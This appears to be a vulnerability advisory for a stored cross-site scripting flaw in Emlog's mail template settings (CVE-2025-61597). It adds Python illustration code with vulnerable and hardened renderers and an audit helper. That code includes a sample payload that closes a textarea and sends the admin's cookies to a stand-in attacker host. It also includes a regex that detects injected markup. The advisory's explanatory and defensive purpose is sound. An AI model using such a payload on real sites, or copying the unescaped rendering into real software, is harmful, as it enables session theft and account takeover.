PT-2025-40460 · Emlog · Emlog

Snowhy77

Published: 2025-10-03 · Updated: 2025-10-20

CVE: CVE-2025-61597
CVSS v3.1: 7.6 (High)
Vector: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L
Name of the Vulnerable Software and Affected Versions: Emlog versions 2.5.21 and below
Description: Emlog is a website building system. In affected versions, a malicious payload can be saved through the mail template settings and is later rendered into the settings page without output encoding, resulting in stored cross-site scripting (XSS). The CVSS vector rates the required privilege as low and user interaction as required: an authenticated user who can edit the mail template stores the payload once, and any subsequent visit to the settings page by an authenticated administrator then executes attacker-controlled JavaScript in the administrator's browser. This can lead to theft of the administrator's session or tokens and complete admin account takeover.
Recommendations: Update to version 2.5.22 or later.
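The following is an added illustration of the vulnerability class described above, not code from Emlog or from the advisory author. It models a settings page that interpolates a stored mail template into a textarea: the vulnerable renderer copies the value verbatim, so a value that closes the textarea and opens a script tag executes for whoever loads the page; the hardened renderer entity-encodes every stored value at output time. It also includes an audit helper for finding already-stored values that contain markup, which is worth running against a site's settings regardless of version, because installing the fixed release does not by itself prove that a payload stored earlier has been removed. The template text, the setting names and the attacker host are all constructed for the example.

```python
import html
import re

# Constructed attacker-controlled value for the mail template setting. It first
# closes the <textarea> the settings page renders the value into, then injects
# a script that exfiltrates the viewing admin's cookies. Not a real Emlog payload.
MALICIOUS_TEMPLATE = (
    "Hello {nickname},</textarea>"
    '<script>new Image().src="https://attacker.example/c?"+'
    "encodeURIComponent(document.cookie)</script>"
)

# A benign template for comparison (also constructed).
BENIGN_TEMPLATE = "Hello {nickname}, you have a new comment on {title}."

# Markup that has no business inside a plain-text mail template.
SUSPICIOUS = re.compile(
    r"</?\s*(script|textarea|iframe|svg|img)\b|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)


def render_settings_vulnerable(settings: dict) -> str:
    """Interpolates stored settings straight into the admin page (the vulnerable pattern)."""
    rows = "".join(
        f'<tr><td>{key}</td><td><textarea name="{key}">{value}</textarea></td></tr>'
        for key, value in settings.items()
    )
    return f"<table>{rows}</table>"


def render_settings_fixed(settings: dict) -> str:
    """Same page, but every stored value is entity-encoded at output time.

    html.escape turns < > & " ' into entities, so a stored </textarea> or
    <script> can no longer terminate the element or start a new one.
    """
    rows = "".join(
        f"<tr><td>{html.escape(key)}</td>"
        f'<td><textarea name="{html.escape(key)}">{html.escape(value)}</textarea></td></tr>'
        for key, value in settings.items()
    )
    return f"<table>{rows}</table>"


def contains_live_script(page: str) -> bool:
    """True if the rendered page contains an unencoded <script> start tag,
    i.e. a browser loading it would execute the injected code."""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


def find_suspicious_settings(settings: dict) -> list:
    """Audit helper: return the setting keys whose stored value contains markup.

    Run this over the existing settings table before and after upgrading;
    the upgrade changes how values are rendered, not what is already stored.
    """
    return sorted(key for key, value in settings.items() if SUSPICIOUS.search(value))


if __name__ == "__main__":
    settings = {"mail_template": MALICIOUS_TEMPLATE, "site_name": "My Blog"}
    print("vulnerable page executes script:",
          contains_live_script(render_settings_vulnerable(settings)))
    print("fixed page executes script:",
          contains_live_script(render_settings_fixed(settings)))
    print("settings holding markup:", find_suspicious_settings(settings))
```

Encoding at output time is the general fix for this class: it protects every value reaching the page, including ones stored before the fix shipped, whereas filtering only on save leaves previously stored payloads live.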

XSS

Related Identifiers

CVE-2025-61597
GHSA-HJ97-HP2C-6M4M

Affected Products

Emlog